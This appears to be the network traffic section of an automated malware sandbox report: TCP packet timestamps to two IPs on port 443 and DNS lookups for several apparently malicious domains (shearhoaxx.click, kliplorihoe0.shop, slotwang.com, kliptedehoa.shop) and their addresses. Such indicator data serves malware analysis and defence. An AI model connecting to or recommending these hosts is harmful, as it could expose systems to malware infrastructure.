                                                                                                                                                                                                                                            Dec 23, 2024 10:35:53.656184912 CET44349711104.21.35.89192.168.2.16
                                                                                                                                                                                                                                            Dec 23, 2024 10:35:53.656289101 CET49711443192.168.2.16104.21.35.89
                                                                                                                                                                                                                                            Dec 23, 2024 10:35:53.657882929 CET49711443192.168.2.16104.21.35.89
                                                                                                                                                                                                                                            Dec 23, 2024 10:35:53.657893896 CET44349711104.21.35.89192.168.2.16
                                                                                                                                                                                                                                            Dec 23, 2024 10:35:53.658123016 CET44349711104.21.35.89192.168.2.16
                                                                                                                                                                                                                                            Dec 23, 2024 10:35:53.664797068 CET49711443192.168.2.16104.21.35.89
                                                                                                                                                                                                                                            Dec 23, 2024 10:35:53.707329035 CET44349711104.21.35.89192.168.2.16
                                                                                                                                                                                                                                            Dec 23, 2024 10:35:53.747131109 CET4434971045.66.248.134192.168.2.16
                                                                                                                                                                                                                                            Dec 23, 2024 10:35:53.747183084 CET4434971045.66.248.134192.168.2.16
                                                                                                                                                                                                                                            Dec 23, 2024 10:35:53.747243881 CET49710443192.168.2.1645.66.248.134
                                                                                                                                                                                                                                            Dec 23, 2024 10:35:53.747255087 CET4434971045.66.248.134192.168.2.16
                                                                                                                                                                                                                                            Dec 23, 2024 10:35:53.747293949 CET49710443192.168.2.1645.66.248.134
                                                                                                                                                                                                                                            Dec 23, 2024 10:35:53.747293949 CET49710443192.168.2.1645.66.248.134
                                                                                                                                                                                                                                            Dec 23, 2024 10:35:53.763498068 CET4434971045.66.248.134192.168.2.16
                                                                                                                                                                                                                                            Dec 23, 2024 10:35:53.763549089 CET4434971045.66.248.134192.168.2.16
                                                                                                                                                                                                                                            Dec 23, 2024 10:35:53.763648987 CET49710443192.168.2.1645.66.248.134
                                                                                                                                                                                                                                            Dec 23, 2024 10:35:53.763648987 CET49710443192.168.2.1645.66.248.134
                                                                                                                                                                                                                                            Dec 23, 2024 10:35:53.763659954 CET4434971045.66.248.134192.168.2.16
                                                                                                                                                                                                                                            Dec 23, 2024 10:35:53.763746977 CET49710443192.168.2.1645.66.248.134
                                                                                                                                                                                                                                            Dec 23, 2024 10:35:53.775299072 CET4434971045.66.248.134192.168.2.16
                                                                                                                                                                                                                                            Dec 23, 2024 10:35:53.775362015 CET4434971045.66.248.134192.168.2.16
                                                                                                                                                                                                                                            Dec 23, 2024 10:35:53.775424004 CET49710443192.168.2.1645.66.248.134
                                                                                                                                                                                                                                            Dec 23, 2024 10:35:53.775432110 CET4434971045.66.248.134192.168.2.16
                                                                                                                                                                                                                                            Dec 23, 2024 10:35:53.775477886 CET49710443192.168.2.1645.66.248.134
                                                                                                                                                                                                                                            Dec 23, 2024 10:35:53.775477886 CET49710443192.168.2.1645.66.248.134
                                                                                                                                                                                                                                            Dec 23, 2024 10:35:53.785690069 CET4434971045.66.248.134192.168.2.16
                                                                                                                                                                                                                                            Dec 23, 2024 10:35:53.785733938 CET4434971045.66.248.134192.168.2.16
                                                                                                                                                                                                                                            Dec 23, 2024 10:35:53.785799980 CET49710443192.168.2.1645.66.248.134
                                                                                                                                                                                                                                            Dec 23, 2024 10:35:53.785806894 CET4434971045.66.248.134192.168.2.16
                                                                                                                                                                                                                                            Dec 23, 2024 10:35:53.785854101 CET49710443192.168.2.1645.66.248.134
                                                                                                                                                                                                                                            Dec 23, 2024 10:35:53.785919905 CET49710443192.168.2.1645.66.248.134
                                                                                                                                                                                                                                            Dec 23, 2024 10:35:53.797631979 CET4434971045.66.248.134192.168.2.16
                                                                                                                                                                                                                                            Dec 23, 2024 10:35:53.797683954 CET4434971045.66.248.134192.168.2.16
                                                                                                                                                                                                                                            Dec 23, 2024 10:35:53.797764063 CET49710443192.168.2.1645.66.248.134
                                                                                                                                                                                                                                            Dec 23, 2024 10:35:53.797764063 CET49710443192.168.2.1645.66.248.134
                                                                                                                                                                                                                                            Dec 23, 2024 10:35:53.797776937 CET4434971045.66.248.134192.168.2.16
                                                                                                                                                                                                                                            Dec 23, 2024 10:35:53.797841072 CET49710443192.168.2.1645.66.248.134
                                                                                                                                                                                                                                            Dec 23, 2024 10:35:53.808352947 CET4434971045.66.248.134192.168.2.16
                                                                                                                                                                                                                                            Dec 23, 2024 10:35:53.808401108 CET4434971045.66.248.134192.168.2.16
                                                                                                                                                                                                                                            Dec 23, 2024 10:35:53.808458090 CET49710443192.168.2.1645.66.248.134
                                                                                                                                                                                                                                            Dec 23, 2024 10:35:53.808476925 CET4434971045.66.248.134192.168.2.16
                                                                                                                                                                                                                                            Dec 23, 2024 10:35:53.808486938 CET49710443192.168.2.1645.66.248.134
                                                                                                                                                                                                                                            Dec 23, 2024 10:35:53.808574915 CET49710443192.168.2.1645.66.248.134
                                                                                                                                                                                                                                            Dec 23, 2024 10:35:53.819483995 CET4434971045.66.248.134192.168.2.16
                                                                                                                                                                                                                                            Dec 23, 2024 10:35:53.819528103 CET4434971045.66.248.134192.168.2.16
                                                                                                                                                                                                                                            Dec 23, 2024 10:35:53.819591999 CET49710443192.168.2.1645.66.248.134
                                                                                                                                                                                                                                            Dec 23, 2024 10:35:53.819597960 CET4434971045.66.248.134192.168.2.16
                                                                                                                                                                                                                                            Dec 23, 2024 10:35:53.819649935 CET49710443192.168.2.1645.66.248.134
                                                                                                                                                                                                                                            Dec 23, 2024 10:35:53.819649935 CET49710443192.168.2.1645.66.248.134
                                                                                                                                                                                                                                            Dec 23, 2024 10:35:53.830733061 CET4434971045.66.248.134192.168.2.16
                                                                                                                                                                                                                                            Dec 23, 2024 10:35:53.830774069 CET4434971045.66.248.134192.168.2.16
                                                                                                                                                                                                                                            Dec 23, 2024 10:35:53.830934048 CET49710443192.168.2.1645.66.248.134
                                                                                                                                                                                                                                            Dec 23, 2024 10:35:53.830934048 CET49710443192.168.2.1645.66.248.134
                                                                                                                                                                                                                                            Dec 23, 2024 10:35:53.830940962 CET4434971045.66.248.134192.168.2.16
                                                                                                                                                                                                                                            Dec 23, 2024 10:35:53.831029892 CET49710443192.168.2.1645.66.248.134
                                                                                                                                                                                                                                            Dec 23, 2024 10:35:53.948390961 CET4434971045.66.248.134192.168.2.16
                                                                                                                                                                                                                                            Dec 23, 2024 10:35:53.948441982 CET4434971045.66.248.134192.168.2.16
                                                                                                                                                                                                                                            Dec 23, 2024 10:35:53.948481083 CET49710443192.168.2.1645.66.248.134
                                                                                                                                                                                                                                            Dec 23, 2024 10:35:53.948498011 CET4434971045.66.248.134192.168.2.16
                                                                                                                                                                                                                                            Dec 23, 2024 10:35:53.948535919 CET49710443192.168.2.1645.66.248.134
                                                                                                                                                                                                                                            Dec 23, 2024 10:35:53.948554993 CET49710443192.168.2.1645.66.248.134
                                                                                                                                                                                                                                            Dec 23, 2024 10:35:53.955966949 CET4434971045.66.248.134192.168.2.16
                                                                                                                                                                                                                                            Dec 23, 2024 10:35:53.956008911 CET4434971045.66.248.134192.168.2.16
                                                                                                                                                                                                                                            Dec 23, 2024 10:35:53.956033945 CET49710443192.168.2.1645.66.248.134
                                                                                                                                                                                                                                            Dec 23, 2024 10:35:53.956041098 CET4434971045.66.248.134192.168.2.16
                                                                                                                                                                                                                                            Dec 23, 2024 10:35:53.956070900 CET49710443192.168.2.1645.66.248.134
                                                                                                                                                                                                                                            Dec 23, 2024 10:35:53.956084967 CET49710443192.168.2.1645.66.248.134
                                                                                                                                                                                                                                            Dec 23, 2024 10:35:53.964206934 CET4434971045.66.248.134192.168.2.16
                                                                                                                                                                                                                                            Dec 23, 2024 10:35:53.964247942 CET4434971045.66.248.134192.168.2.16
                                                                                                                                                                                                                                            Dec 23, 2024 10:35:53.964271069 CET49710443192.168.2.1645.66.248.134
                                                                                                                                                                                                                                            Dec 23, 2024 10:35:53.964277029 CET4434971045.66.248.134192.168.2.16
                                                                                                                                                                                                                                            Dec 23, 2024 10:35:53.964313030 CET49710443192.168.2.1645.66.248.134
                                                                                                                                                                                                                                            Dec 23, 2024 10:35:53.964334011 CET49710443192.168.2.1645.66.248.134
                                                                                                                                                                                                                                            Dec 23, 2024 10:35:53.972412109 CET4434971045.66.248.134192.168.2.16
                                                                                                                                                                                                                                            Dec 23, 2024 10:35:53.972426891 CET4434971045.66.248.134192.168.2.16
                                                                                                                                                                                                                                            Dec 23, 2024 10:35:53.972486973 CET49710443192.168.2.1645.66.248.134
                                                                                                                                                                                                                                            Dec 23, 2024 10:35:53.972493887 CET4434971045.66.248.134192.168.2.16
                                                                                                                                                                                                                                            Dec 23, 2024 10:35:53.972534895 CET49710443192.168.2.1645.66.248.134
                                                                                                                                                                                                                                            Dec 23, 2024 10:35:53.979681015 CET4434971045.66.248.134192.168.2.16
                                                                                                                                                                                                                                            Dec 23, 2024 10:35:53.979727983 CET4434971045.66.248.134192.168.2.16
                                                                                                                                                                                                                                            Dec 23, 2024 10:35:53.979764938 CET49710443192.168.2.1645.66.248.134
                                                                                                                                                                                                                                            Dec 23, 2024 10:35:53.979770899 CET4434971045.66.248.134192.168.2.16
                                                                                                                                                                                                                                            Dec 23, 2024 10:35:53.979799032 CET49710443192.168.2.1645.66.248.134
                                                                                                                                                                                                                                            Dec 23, 2024 10:35:53.979814053 CET49710443192.168.2.1645.66.248.134
                                                                                                                                                                                                                                            Dec 23, 2024 10:35:53.988452911 CET4434971045.66.248.134192.168.2.16
                                                                                                                                                                                                                                            Dec 23, 2024 10:35:53.988496065 CET4434971045.66.248.134192.168.2.16
                                                                                                                                                                                                                                            Dec 23, 2024 10:35:53.988518953 CET49710443192.168.2.1645.66.248.134
                                                                                                                                                                                                                                            Dec 23, 2024 10:35:53.988524914 CET4434971045.66.248.134192.168.2.16
                                                                                                                                                                                                                                            Dec 23, 2024 10:35:53.988553047 CET49710443192.168.2.1645.66.248.134
                                                                                                                                                                                                                                            Dec 23, 2024 10:35:53.988567114 CET49710443192.168.2.1645.66.248.134
                                                                                                                                                                                                                                            Dec 23, 2024 10:35:53.995629072 CET4434971045.66.248.134192.168.2.16
                                                                                                                                                                                                                                            Dec 23, 2024 10:35:53.995673895 CET4434971045.66.248.134192.168.2.16
                                                                                                                                                                                                                                            Dec 23, 2024 10:35:53.995707989 CET49710443192.168.2.1645.66.248.134
                                                                                                                                                                                                                                            Dec 23, 2024 10:35:53.995713949 CET4434971045.66.248.134192.168.2.16
                                                                                                                                                                                                                                            Dec 23, 2024 10:35:53.995738983 CET49710443192.168.2.1645.66.248.134
                                                                                                                                                                                                                                            Dec 23, 2024 10:35:53.995754957 CET49710443192.168.2.1645.66.248.134
                                                                                                                                                                                                                                            Dec 23, 2024 10:35:54.003963947 CET4434971045.66.248.134192.168.2.16
                                                                                                                                                                                                                                            Dec 23, 2024 10:35:54.004010916 CET4434971045.66.248.134192.168.2.16
                                                                                                                                                                                                                                            Dec 23, 2024 10:35:54.004046917 CET49710443192.168.2.1645.66.248.134
                                                                                                                                                                                                                                            Dec 23, 2024 10:35:54.004055977 CET4434971045.66.248.134192.168.2.16
                                                                                                                                                                                                                                            Dec 23, 2024 10:35:54.004081964 CET49710443192.168.2.1645.66.248.134
                                                                                                                                                                                                                                            Dec 23, 2024 10:35:54.004100084 CET49710443192.168.2.1645.66.248.134
                                                                                                                                                                                                                                            Dec 23, 2024 10:35:54.140177011 CET4434971045.66.248.134192.168.2.16
                                                                                                                                                                                                                                            Dec 23, 2024 10:35:54.140242100 CET4434971045.66.248.134192.168.2.16
                                                                                                                                                                                                                                            Dec 23, 2024 10:35:54.140254021 CET49710443192.168.2.1645.66.248.134
                                                                                                                                                                                                                                            Dec 23, 2024 10:35:54.140263081 CET4434971045.66.248.134192.168.2.16
                                                                                                                                                                                                                                            Dec 23, 2024 10:35:54.140312910 CET49710443192.168.2.1645.66.248.134
                                                                                                                                                                                                                                            Dec 23, 2024 10:35:54.146804094 CET4434971045.66.248.134192.168.2.16
                                                                                                                                                                                                                                            Dec 23, 2024 10:35:54.146847010 CET4434971045.66.248.134192.168.2.16
                                                                                                                                                                                                                                            Dec 23, 2024 10:35:54.146878958 CET49710443192.168.2.1645.66.248.134
                                                                                                                                                                                                                                            Dec 23, 2024 10:35:54.146883965 CET4434971045.66.248.134192.168.2.16
                                                                                                                                                                                                                                            Dec 23, 2024 10:35:54.146929026 CET49710443192.168.2.1645.66.248.134
                                                                                                                                                                                                                                            Dec 23, 2024 10:35:54.154576063 CET4434971045.66.248.134192.168.2.16
                                                                                                                                                                                                                                            Dec 23, 2024 10:35:54.154618025 CET4434971045.66.248.134192.168.2.16
                                                                                                                                                                                                                                            Dec 23, 2024 10:35:54.154656887 CET49710443192.168.2.1645.66.248.134
                                                                                                                                                                                                                                            Dec 23, 2024 10:35:54.154661894 CET4434971045.66.248.134192.168.2.16
                                                                                                                                                                                                                                            Dec 23, 2024 10:35:54.154684067 CET49710443192.168.2.1645.66.248.134
                                                                                                                                                                                                                                            Dec 23, 2024 10:35:54.154704094 CET49710443192.168.2.1645.66.248.134
                                                                                                                                                                                                                                            Dec 23, 2024 10:35:54.162136078 CET4434971045.66.248.134192.168.2.16
                                                                                                                                                                                                                                            Dec 23, 2024 10:35:54.162177086 CET4434971045.66.248.134192.168.2.16
                                                                                                                                                                                                                                            Dec 23, 2024 10:35:54.162209988 CET49710443192.168.2.1645.66.248.134
                                                                                                                                                                                                                                            Dec 23, 2024 10:35:54.162218094 CET4434971045.66.248.134192.168.2.16
                                                                                                                                                                                                                                            Dec 23, 2024 10:35:54.162250996 CET49710443192.168.2.1645.66.248.134
                                                                                                                                                                                                                                            Dec 23, 2024 10:35:54.162266970 CET49710443192.168.2.1645.66.248.134
                                                                                                                                                                                                                                            Dec 23, 2024 10:35:54.169863939 CET4434971045.66.248.134192.168.2.16
                                                                                                                                                                                                                                            Dec 23, 2024 10:35:54.169909954 CET4434971045.66.248.134192.168.2.16
                                                                                                                                                                                                                                            Dec 23, 2024 10:35:54.169939041 CET49710443192.168.2.1645.66.248.134
                                                                                                                                                                                                                                            Dec 23, 2024 10:35:54.169945002 CET4434971045.66.248.134192.168.2.16
                                                                                                                                                                                                                                            Dec 23, 2024 10:35:54.169979095 CET49710443192.168.2.1645.66.248.134
                                                                                                                                                                                                                                            Dec 23, 2024 10:35:54.170001984 CET49710443192.168.2.1645.66.248.134
                                                                                                                                                                                                                                            Dec 23, 2024 10:35:54.177187920 CET4434971045.66.248.134192.168.2.16
                                                                                                                                                                                                                                            Dec 23, 2024 10:35:54.177228928 CET4434971045.66.248.134192.168.2.16
                                                                                                                                                                                                                                            Dec 23, 2024 10:35:54.177262068 CET49710443192.168.2.1645.66.248.134
                                                                                                                                                                                                                                            Dec 23, 2024 10:35:54.177274942 CET4434971045.66.248.134192.168.2.16
                                                                                                                                                                                                                                            Dec 23, 2024 10:35:54.177304983 CET49710443192.168.2.1645.66.248.134
                                                                                                                                                                                                                                            Dec 23, 2024 10:35:54.177314043 CET49710443192.168.2.1645.66.248.134
                                                                                                                                                                                                                                            Dec 23, 2024 10:35:54.183870077 CET4434971045.66.248.134192.168.2.16
                                                                                                                                                                                                                                            Dec 23, 2024 10:35:54.183912039 CET4434971045.66.248.134192.168.2.16
                                                                                                                                                                                                                                            Dec 23, 2024 10:35:54.183943033 CET49710443192.168.2.1645.66.248.134
                                                                                                                                                                                                                                            Dec 23, 2024 10:35:54.183959961 CET4434971045.66.248.134192.168.2.16
                                                                                                                                                                                                                                            Dec 23, 2024 10:35:54.183993101 CET49710443192.168.2.1645.66.248.134
                                                                                                                                                                                                                                            Dec 23, 2024 10:35:54.184007883 CET49710443192.168.2.1645.66.248.134
                                                                                                                                                                                                                                            Dec 23, 2024 10:35:54.191538095 CET4434971045.66.248.134192.168.2.16
                                                                                                                                                                                                                                            Dec 23, 2024 10:35:54.191582918 CET4434971045.66.248.134192.168.2.16
                                                                                                                                                                                                                                            Dec 23, 2024 10:35:54.191622972 CET49710443192.168.2.1645.66.248.134
                                                                                                                                                                                                                                            Dec 23, 2024 10:35:54.191628933 CET4434971045.66.248.134192.168.2.16
                                                                                                                                                                                                                                            Dec 23, 2024 10:35:54.191670895 CET49710443192.168.2.1645.66.248.134
                                                                                                                                                                                                                                            Dec 23, 2024 10:35:54.191688061 CET49710443192.168.2.1645.66.248.134
                                                                                                                                                                                                                                            Dec 23, 2024 10:35:54.271367073 CET44349711104.21.35.89192.168.2.16
                                                                                                                                                                                                                                            Dec 23, 2024 10:35:54.271420956 CET44349711104.21.35.89192.168.2.16
                                                                                                                                                                                                                                            Dec 23, 2024 10:35:54.271451950 CET44349711104.21.35.89192.168.2.16
                                                                                                                                                                                                                                            Dec 23, 2024 10:35:54.271467924 CET49711443192.168.2.16104.21.35.89
                                                                                                                                                                                                                                            Dec 23, 2024 10:35:54.271497965 CET44349711104.21.35.89192.168.2.16
                                                                                                                                                                                                                                            Dec 23, 2024 10:35:54.271533966 CET49711443192.168.2.16104.21.35.89
                                                                                                                                                                                                                                            Dec 23, 2024 10:35:54.271542072 CET44349711104.21.35.89192.168.2.16
                                                                                                                                                                                                                                            Dec 23, 2024 10:35:54.271579027 CET44349711104.21.35.89192.168.2.16
                                                                                                                                                                                                                                            Dec 23, 2024 10:35:54.271616936 CET49711443192.168.2.16104.21.35.89
                                                                                                                                                                                                                                            Dec 23, 2024 10:35:54.271625042 CET44349711104.21.35.89192.168.2.16
                                                                                                                                                                                                                                            Dec 23, 2024 10:35:54.282593012 CET44349711104.21.35.89192.168.2.16
                                                                                                                                                                                                                                            Dec 23, 2024 10:35:54.282666922 CET49711443192.168.2.16104.21.35.89
                                                                                                                                                                                                                                            Dec 23, 2024 10:35:54.282686949 CET44349711104.21.35.89192.168.2.16
                                                                                                                                                                                                                                            Dec 23, 2024 10:35:54.291006088 CET44349711104.21.35.89192.168.2.16
                                                                                                                                                                                                                                            Dec 23, 2024 10:35:54.291081905 CET49711443192.168.2.16104.21.35.89
                                                                                                                                                                                                                                            Dec 23, 2024 10:35:54.291104078 CET44349711104.21.35.89192.168.2.16
                                                                                                                                                                                                                                            Dec 23, 2024 10:35:54.332231045 CET4434971045.66.248.134192.168.2.16
                                                                                                                                                                                                                                            Dec 23, 2024 10:35:54.332287073 CET4434971045.66.248.134192.168.2.16
                                                                                                                                                                                                                                            Dec 23, 2024 10:35:54.332304001 CET49710443192.168.2.1645.66.248.134
                                                                                                                                                                                                                                            Dec 23, 2024 10:35:54.332324028 CET4434971045.66.248.134192.168.2.16
                                                                                                                                                                                                                                            Dec 23, 2024 10:35:54.332351923 CET49710443192.168.2.1645.66.248.134
                                                                                                                                                                                                                                            Dec 23, 2024 10:35:54.332370996 CET49710443192.168.2.1645.66.248.134
                                                                                                                                                                                                                                            Dec 23, 2024 10:35:54.336464882 CET49711443192.168.2.16104.21.35.89
                                                                                                                                                                                                                                            Dec 23, 2024 10:35:54.339689016 CET4434971045.66.248.134192.168.2.16
                                                                                                                                                                                                                                            Dec 23, 2024 10:35:54.339704037 CET4434971045.66.248.134192.168.2.16
                                                                                                                                                                                                                                            Dec 23, 2024 10:35:54.339765072 CET49710443192.168.2.1645.66.248.134
                                                                                                                                                                                                                                            Dec 23, 2024 10:35:54.339776039 CET4434971045.66.248.134192.168.2.16
                                                                                                                                                                                                                                            Dec 23, 2024 10:35:54.339853048 CET49710443192.168.2.1645.66.248.134
                                                                                                                                                                                                                                            Dec 23, 2024 10:35:54.346604109 CET4434971045.66.248.134192.168.2.16
                                                                                                                                                                                                                                            Dec 23, 2024 10:35:54.346622944 CET4434971045.66.248.134192.168.2.16
                                                                                                                                                                                                                                            Dec 23, 2024 10:35:54.346673012 CET49710443192.168.2.1645.66.248.134
                                                                                                                                                                                                                                            Dec 23, 2024 10:35:54.346688032 CET4434971045.66.248.134192.168.2.16
                                                                                                                                                                                                                                            Dec 23, 2024 10:35:54.346702099 CET49710443192.168.2.1645.66.248.134
                                                                                                                                                                                                                                            Dec 23, 2024 10:35:54.346729994 CET49710443192.168.2.1645.66.248.134
                                                                                                                                                                                                                                            Dec 23, 2024 10:35:54.354091883 CET4434971045.66.248.134192.168.2.16
                                                                                                                                                                                                                                            Dec 23, 2024 10:35:54.354110003 CET4434971045.66.248.134192.168.2.16
                                                                                                                                                                                                                                            Dec 23, 2024 10:35:54.354156971 CET49710443192.168.2.1645.66.248.134
                                                                                                                                                                                                                                            Dec 23, 2024 10:35:54.354175091 CET4434971045.66.248.134192.168.2.16
                                                                                                                                                                                                                                            Dec 23, 2024 10:35:54.354214907 CET49710443192.168.2.1645.66.248.134
                                                                                                                                                                                                                                            Dec 23, 2024 10:35:54.361804008 CET4434971045.66.248.134192.168.2.16
                                                                                                                                                                                                                                            Dec 23, 2024 10:35:54.361823082 CET4434971045.66.248.134192.168.2.16
                                                                                                                                                                                                                                            Dec 23, 2024 10:35:54.361876965 CET49710443192.168.2.1645.66.248.134
                                                                                                                                                                                                                                            Dec 23, 2024 10:35:54.361887932 CET4434971045.66.248.134192.168.2.16
                                                                                                                                                                                                                                            Dec 23, 2024 10:35:54.361932039 CET49710443192.168.2.1645.66.248.134
                                                                                                                                                                                                                                            Dec 23, 2024 10:35:54.369087934 CET4434971045.66.248.134192.168.2.16
                                                                                                                                                                                                                                            Dec 23, 2024 10:35:54.369106054 CET4434971045.66.248.134192.168.2.16
                                                                                                                                                                                                                                            Dec 23, 2024 10:35:54.369172096 CET49710443192.168.2.1645.66.248.134
                                                                                                                                                                                                                                            Dec 23, 2024 10:35:54.369179964 CET4434971045.66.248.134192.168.2.16
                                                                                                                                                                                                                                            Dec 23, 2024 10:35:54.369221926 CET49710443192.168.2.1645.66.248.134
                                                                                                                                                                                                                                            Dec 23, 2024 10:35:54.369853973 CET49710443192.168.2.1645.66.248.134
                                                                                                                                                                                                                                            Dec 23, 2024 10:35:54.376705885 CET4434971045.66.248.134192.168.2.16
                                                                                                                                                                                                                                            Dec 23, 2024 10:35:54.376729012 CET4434971045.66.248.134192.168.2.16
                                                                                                                                                                                                                                            Dec 23, 2024 10:35:54.376791954 CET49710443192.168.2.1645.66.248.134
                                                                                                                                                                                                                                            Dec 23, 2024 10:35:54.376800060 CET4434971045.66.248.134192.168.2.16
                                                                                                                                                                                                                                            Dec 23, 2024 10:35:54.376847029 CET49710443192.168.2.1645.66.248.134
                                                                                                                                                                                                                                            Dec 23, 2024 10:35:54.383553028 CET4434971045.66.248.134192.168.2.16
                                                                                                                                                                                                                                            Dec 23, 2024 10:35:54.383570910 CET4434971045.66.248.134192.168.2.16
                                                                                                                                                                                                                                            Dec 23, 2024 10:35:54.383636951 CET49710443192.168.2.1645.66.248.134
                                                                                                                                                                                                                                            Dec 23, 2024 10:35:54.383651018 CET4434971045.66.248.134192.168.2.16
                                                                                                                                                                                                                                            Dec 23, 2024 10:35:54.383698940 CET49710443192.168.2.1645.66.248.134
                                                                                                                                                                                                                                            Dec 23, 2024 10:35:54.385344982 CET49710443192.168.2.1645.66.248.134
                                                                                                                                                                                                                                            Dec 23, 2024 10:35:54.390882969 CET44349711104.21.35.89192.168.2.16
                                                                                                                                                                                                                                            Dec 23, 2024 10:35:54.431473017 CET49711443192.168.2.16104.21.35.89
                                                                                                                                                                                                                                            Dec 23, 2024 10:35:54.431502104 CET44349711104.21.35.89192.168.2.16
                                                                                                                                                                                                                                            Dec 23, 2024 10:35:54.465636015 CET44349711104.21.35.89192.168.2.16
                                                                                                                                                                                                                                            Dec 23, 2024 10:35:54.465707064 CET49711443192.168.2.16104.21.35.89
                                                                                                                                                                                                                                            Dec 23, 2024 10:35:54.465729952 CET44349711104.21.35.89192.168.2.16
                                                                                                                                                                                                                                            Dec 23, 2024 10:35:54.478537083 CET44349711104.21.35.89192.168.2.16
                                                                                                                                                                                                                                            Dec 23, 2024 10:35:54.478560925 CET44349711104.21.35.89192.168.2.16
                                                                                                                                                                                                                                            Dec 23, 2024 10:35:54.478595018 CET49711443192.168.2.16104.21.35.89
                                                                                                                                                                                                                                            Dec 23, 2024 10:35:54.478609085 CET44349711104.21.35.89192.168.2.16
                                                                                                                                                                                                                                            Dec 23, 2024 10:35:54.478646994 CET49711443192.168.2.16104.21.35.89
                                                                                                                                                                                                                                            Dec 23, 2024 10:35:54.487457991 CET44349711104.21.35.89192.168.2.16
                                                                                                                                                                                                                                            Dec 23, 2024 10:35:54.494858027 CET44349711104.21.35.89192.168.2.16
                                                                                                                                                                                                                                            Dec 23, 2024 10:35:54.494900942 CET44349711104.21.35.89192.168.2.16
                                                                                                                                                                                                                                            Dec 23, 2024 10:35:54.494918108 CET49711443192.168.2.16104.21.35.89
                                                                                                                                                                                                                                            Dec 23, 2024 10:35:54.494934082 CET44349711104.21.35.89192.168.2.16
                                                                                                                                                                                                                                            Dec 23, 2024 10:35:54.494976044 CET49711443192.168.2.16104.21.35.89
                                                                                                                                                                                                                                            Dec 23, 2024 10:35:54.503062963 CET44349711104.21.35.89192.168.2.16
                                                                                                                                                                                                                                            Dec 23, 2024 10:35:54.511147022 CET44349711104.21.35.89192.168.2.16
                                                                                                                                                                                                                                            Dec 23, 2024 10:35:54.511224985 CET49711443192.168.2.16104.21.35.89
                                                                                                                                                                                                                                            TimestampSource PortDest PortSource IPDest IP
                                                                                                                                                                                                                                            Dec 23, 2024 10:35:10.042277098 CET6374653192.168.2.161.1.1.1
                                                                                                                                                                                                                                            Dec 23, 2024 10:35:10.277992010 CET53637461.1.1.1192.168.2.16
                                                                                                                                                                                                                                            Dec 23, 2024 10:35:28.344888926 CET5788253192.168.2.161.1.1.1
                                                                                                                                                                                                                                            Dec 23, 2024 10:35:28.672821999 CET53578821.1.1.1192.168.2.16
                                                                                                                                                                                                                                            Dec 23, 2024 10:35:44.214869022 CET5148553192.168.2.161.1.1.1
                                                                                                                                                                                                                                            Dec 23, 2024 10:35:44.361274958 CET53514851.1.1.1192.168.2.16
                                                                                                                                                                                                                                            Dec 23, 2024 10:35:48.492522955 CET6127553192.168.2.161.1.1.1
                                                                                                                                                                                                                                            Dec 23, 2024 10:35:48.795543909 CET53612751.1.1.1192.168.2.16
                                                                                                                                                                                                                                            Dec 23, 2024 10:35:50.646886110 CET6092353192.168.2.161.1.1.1
                                                                                                                                                                                                                                            Dec 23, 2024 10:35:51.284506083 CET53609231.1.1.1192.168.2.16
                                                                                                                                                                                                                                            Dec 23, 2024 10:35:52.106946945 CET5809353192.168.2.161.1.1.1
                                                                                                                                                                                                                                            Dec 23, 2024 10:35:52.426035881 CET53580931.1.1.1192.168.2.16
                                                                                                                                                                                                                                            TimestampSource IPDest IPTrans IDOP CodeNameTypeClassDNS over HTTPS
                                                                                                                                                                                                                                            Dec 23, 2024 10:35:10.042277098 CET192.168.2.161.1.1.10xb4bdStandard query (0)cGJmezVyRdXbTgHBdDquAsIHIVjMv.cGJmezVyRdXbTgHBdDquAsIHIVjMvA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                            Dec 23, 2024 10:35:28.344888926 CET192.168.2.161.1.1.10xb1d3Standard query (0)shearhoaxx.clickA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                            Dec 23, 2024 10:35:44.214869022 CET192.168.2.161.1.1.10xf6ffStandard query (0)cGJmezVyRdXbTgHBdDquAsIHIVjMv.cGJmezVyRdXbTgHBdDquAsIHIVjMvA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                            Dec 23, 2024 10:35:48.492522955 CET192.168.2.161.1.1.10x95ffStandard query (0)kliplorihoe0.shopA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                            Dec 23, 2024 10:35:50.646886110 CET192.168.2.161.1.1.10x2f2bStandard query (0)slotwang.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                            Dec 23, 2024 10:35:52.106946945 CET192.168.2.161.1.1.10x8d6bStandard query (0)kliptedehoa.shopA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                            TimestampSource IPDest IPTrans IDReply CodeNameCNameAddressTypeClassDNS over HTTPS
                                                                                                                                                                                                                                            Dec 23, 2024 10:35:10.277992010 CET1.1.1.1192.168.2.160xb4bdName error (3)cGJmezVyRdXbTgHBdDquAsIHIVjMv.cGJmezVyRdXbTgHBdDquAsIHIVjMvnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                            Dec 23, 2024 10:35:28.672821999 CET1.1.1.1192.168.2.160xb1d3No error (0)shearhoaxx.click172.67.129.49A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                            Dec 23, 2024 10:35:28.672821999 CET1.1.1.1192.168.2.160xb1d3No error (0)shearhoaxx.click104.21.1.114A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                            Dec 23, 2024 10:35:44.361274958 CET1.1.1.1192.168.2.160xf6ffName error (3)cGJmezVyRdXbTgHBdDquAsIHIVjMv.cGJmezVyRdXbTgHBdDquAsIHIVjMvnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                            Dec 23, 2024 10:35:48.795543909 CET1.1.1.1192.168.2.160x95ffNo error (0)kliplorihoe0.shop172.67.182.135A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                            Dec 23, 2024 10:35:48.795543909 CET1.1.1.1192.168.2.160x95ffNo error (0)kliplorihoe0.shop104.21.43.169A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                            Dec 23, 2024 10:35:51.284506083 CET1.1.1.1192.168.2.160x2f2bNo error (0)slotwang.com45.66.248.134A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                            Dec 23, 2024 10:35:52.426035881 CET1.1.1.1192.168.2.160x8d6bNo error (0)kliptedehoa.shop104.21.35.89A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                            Dec 23, 2024 10:35:52.426035881 CET1.1.1.1192.168.2.160x8d6bNo error (0)kliptedehoa.shop172.67.216.59A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                            • shearhoaxx.click
                                                                                                                                                                                                                                            • kliplorihoe0.shop
